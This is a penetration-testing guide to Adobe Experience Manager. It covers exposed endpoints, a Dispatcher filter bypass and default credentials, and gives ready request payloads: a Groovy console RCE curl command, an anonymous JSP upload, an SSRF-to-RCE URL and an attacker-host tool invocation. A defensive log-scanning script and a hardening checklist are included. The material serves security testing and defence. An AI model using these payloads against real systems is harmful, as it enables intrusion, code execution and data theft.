# AEM (Adobe Experience Manager) Pentesting
{{#include ../../banners/hacktricks-training.md}}
> Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS that runs on top of Apache Sling/Felix (OSGi) and a Java Content Repository (JCR).
> From an attacker's perspective, AEM instances very often expose dangerous development endpoints, weak Dispatcher rules, default credentials and a long tail of CVEs that are patched every quarter.

The checklist below focuses on the **externally reachable (unauthenticated) attack surface** that keeps showing up in real engagements (2022-2025).
---
## 1. Fingerprinting
```
$ curl -s -I https://target | egrep -i "aem|sling|cq"
X-Content-Type-Options: nosniff
X-Dispatcher: hu1 # header added by AEM Dispatcher
X-Vary: Accept-Encoding
```
Other quick indicators:
* `/etc.clientlibs/` static path present (returns JS/CSS).
* `/libs/granite/core/content/login.html` login page with the “Adobe Experience Manager” banner.
* `</script><!--/* CQ */-->` comment at the bottom of HTML.
---
## 2. High-value unauthenticated endpoints
Path | What you get | Notes
---- | ------------- | -----
`/.json`, `/.1.json` | JCR nodes via **DefaultGetServlet** | Often blocked, but *Dispatcher bypass* (see below) works.
`/bin/querybuilder.json?path=/` | QueryBuilder API | Leak of page tree, internal paths, user names.
`/system/console/status-*`, `/system/console/bundles` | OSGi/Felix console | 403 by default; if exposed & creds found ⇒ bundle-upload RCE.
`/crx/packmgr/index.jsp` | Package Manager | Allows authenticated content packages → JSP payload upload.
`/etc/groovyconsole/**` | AEM Groovy Console | If exposed → arbitrary Groovy / Java execution.
`/libs/cq/AuditlogSearchServlet.json` | Audit logs | Information disclosure.
`/libs/cq/ui/content/dumplibs.html` | ClientLibs dump | XSS vector.
### Dispatcher bypass trick
Most production sites sit behind the *Dispatcher* (reverse-proxy). Its filter rules can be bypassed by appending an allowed static extension **after a semicolon or encoded newline**:
```http
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
```
A single request like the one above frequently discloses user-profile nodes with email addresses. P-T Partners published good guidance on this weakness.
---
## 3. Common misconfigurations (still alive in 2025)
1. **Anonymous POST servlet**: `POST /.json` with `:operation=import` lets you plant new JCR nodes. Blocking POST to `*.json` in the Dispatcher fixes it.
2. **World-readable user profiles**: the default ACL grants `jcr:read` on `/home/users/**/profile/*` to everyone.
3. **Default credentials**: `admin:admin`, `author:author`, `replication:replication`.
4. **WCMDebugFilter** enabled ⇒ reflected XSS via `?debug=layout` (CVE-2016-7882, still found on legacy 6.4 installs).
5. **Groovy Console exposed**: remote code execution by sending a Groovy script:
```bash
curl -u admin:admin -d 'script=println "pwn".execute()' https://target/bin/groovyconsole/post.json
```
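As an added defensive example (not part of the original page), the following detection logic runs over Dispatcher/Apache access-log lines and flags the semicolon / encoded-newline bypass from section 2 as well as a successful `POST` to a `.json` path (item 1 above). The sample log lines, the static-extension allow-list and the sensitive-path list are constructed assumptions; an access log does not show whether a POST was authenticated, so that hit is flagged for follow-up rather than proven anonymous.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jul/2025:10:00:01 +0000] "GET /etc.clientlibs/site/clientlibs/site.css HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
203.0.113.7 - - [01/Jul/2025:10:00:02 +0000] "GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1" 200 8812 "-" "curl/8.4.0"
203.0.113.7 - - [01/Jul/2025:10:00:03 +0000] "POST /.json HTTP/1.1" 201 0 "-" "curl/8.4.0"
203.0.113.7 - - [01/Jul/2025:10:00:04 +0000] "GET /content/site/en.html HTTP/1.1" 200 15230 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Extensions a typical Dispatcher filter allows through unconditionally (assumed list).
STATIC_EXT = re.compile(r'\.(css|js|png|gif|jpe?g|ico|svg|woff2?)$', re.I)
# Paths that should never be reachable anonymously (assumed list, based on section 2).
SENSITIVE = re.compile(r'^(/bin/|/system/console|/crx/|/etc/groovyconsole|.*\.json$)', re.I)
# Separators the Dispatcher matches against literally but Sling discards before resolving.
SPLIT_RE = re.compile(r';|%0a|%0d', re.I)

def resolve_sling_path(path):
    """Return the path Sling actually resolves: everything before ';' or an encoded newline."""
    return unquote(SPLIT_RE.split(path, 1)[0])

def analyse_request(method, target, status):
    """Return a list of finding strings for one request line."""
    path = target.split('?', 1)[0]
    real = resolve_sling_path(path)
    findings = []
    # 1. Filter bypass: static extension at the end, but a sensitive path once Sling strips the tail.
    if SPLIT_RE.search(path) and STATIC_EXT.search(path) and SENSITIVE.match(real):
        findings.append(f"dispatcher-bypass: {path} resolves to {real}")
    # 2. POST servlet write: a 2xx on POST to a .json path means the Sling POST servlet answered.
    if method == 'POST' and real.endswith('.json') and status.startswith('2'):
        findings.append(f"post-servlet-write: POST {real} -> {status}")
    return findings

def scan_log(text):
    """Scan access-log text and return (request target, finding) pairs."""
    results = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        for finding in analyse_request(m['method'], m['target'], m['status']):
            results.append((m['target'], finding))
    return results

if __name__ == '__main__':
    for target, finding in scan_log(SAMPLE_LOG):
        print(finding)
```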
---
## 4. Recent vulnerabilities (service-pack cadence)
Quarter | CVE | Affected | Impact
------- | --- | -------- | ------
Dec 2024 | **CVE-2024-43711** | 6.5.21 and earlier | Improper input validation → **Arbitrary code execution** (requires low-priv auth).
Dec 2024 | CVE-2024-43724/26 | 6.5.21 and earlier | DOM / Stored XSS in Move Page Wizard.
Dec 2023 | CVE-2023-48452/68 | ≤ 6.5.18 | DOM-based XSS via crafted URL.
Dec 2022 | CVE-2022-30683 | ≤ 6.5.13 | Crypto design flaw → secret decryption (needs low-priv creds).

Always check the *APSB* bulletin matching the customer's service pack and request the latest **6.5.22** or *Cloud Service 2024.11*.
---
## 5. Exploitation snippets
### 5.1 RCE via dispatcher bypass + JSP upload
If anonymous write is possible:
```http
# 1. Create a node that will become /content/evil.jsp
POST /content/evil.jsp;%0aa.css HTTP/1.1
Content-Type: application/x-www-form-urlencoded

:contentType=text/plain
jcr:data=<% out.println("pwned"); %>
:operation=import
```
Now request `/content/evil.jsp`; the JSP runs as the AEM process user.
### 5.2 SSRF to RCE (historical < 6.3)
`/libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console`
`aem_ssrf2rce.py` from **aem-hacker** automates the full chain.
---
## 6. Tooling
* **aem-hacker**: Swiss-army enumeration script that supports Dispatcher bypass, SSRF detection, default-credential checks and more.
```bash
python3 aem_hacker.py -u https://target --host attacker-ip
```
* **Content brute-force**: recursively request `/_jcr_content.(json|html)` to discover hidden components.
* **osgi-infect**: upload a malicious OSGi bundle via `/system/console/bundles` if credentials are available.
---
## 7. Hardening checklist (for your report's recommendations)
1. Keep the instance on the **latest cumulative service pack** (as of Jul 2025: 6.5.22).
2. Remove/rotate default accounts; enforce SSO/SAML.
3. Tighten **Dispatcher filters**: deny `;`, encoded newlines, and `*.json` / `*.querybuilder.json` for anonymous users.
4. Disable or protect consoles (`/system/console`, `/crx/*`, `/etc/groovyconsole`) with IP allow-lists.
5. Apply the *Anonymous Permission Hardening* package shipped by Adobe.
## References
* Adobe Security Bulletin APSB24-69 “Security updates for Adobe Experience Manager (Dec 2024)”.
* 0ang3el aem-hacker tool (GitHub).
{{#include ../../banners/hacktricks-training.md}}